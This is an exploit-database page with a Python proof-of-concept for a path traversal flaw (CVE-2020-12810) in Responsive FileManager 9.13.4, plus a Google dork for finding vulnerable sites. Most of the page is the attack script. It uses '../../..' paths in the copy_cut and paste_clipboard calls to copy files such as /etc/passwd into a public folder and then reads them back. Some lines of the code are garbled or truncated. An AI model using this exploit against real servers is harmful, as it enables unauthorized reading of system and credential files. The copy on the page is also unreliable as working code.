Responsive FileManager 9.13.4 Path Traversal

CVE Category Price Severity
CVE-2020-12810 CWE-22 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-01-05
CVSS:9.8/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.01242 0.121

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Responsive FileManager 9.13.4 Path Traversal
# Exploit Title: Responsive FileManager 9.13.4 - 'path' Path Traversal
# Date: 12/12/2018 (PoC)
# Date: 04/01/2020 (Auto Exploit)
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Google Dork: intitle:"Responsive FileManager 9.x.x"
# Vendor Homepage:
# Software Link:
# Version: < 9.13.4
# Tested on: Linux 64bit + Python3


# Usage: python [URL] [SESSION] [File Path]
# python3 PHPSESSID=hfpg2g4rdpvmpgth33jn643hq4 /etc/passwd

import requests
import sys

def usage():
if len(sys.argv) != 4:
print("Usage: python3 [URL]")

def copy_cut(url, session_cookie, file_name):
headers = {'Cookie': session_cookie,
'Content-Type': 'application/x-www-form-urlencoded'}
url_copy = "%s/filemanager/ajax_calls.php?action=copy_cut" % (url)
r =
url_copy, data="sub_action=copy&path=../../../../../../.."+file_name,headers=headers)
return r.status_code

def paste_clipboard(url, session_cookie):
headers = {'Cookie': session_cookie,'Content-Type': 'application/x-www-form-urlencoded'}
url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url)
r =
url_paste, data="path=", headers=headers)
return r.status_code

def read_file(url, file_name):
name_file = file_name.split('/')[-1]
url_path = "%s/source/%s" % (url,name_file) #This is the default directory,
#if the website is a little different, edit this place
result = requests.get(url_path)
return result.text

def main():
url = sys.argv[1]
session_cookie = sys.argv[2]
file_name = sys.argv[3]
print("[*] Copy Clipboard")
copy_result = copy_cut(url, session_cookie, file_name)
if copy_result==200:
paste_result = paste_clipboard(url, session_cookie)
print("[-] Paste False")
if paste_result==200:
print("[*] Paste Clipboard")
print(read_file(url, file_name))
print("[-] Copy False")

if __name__ == "__main__":

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum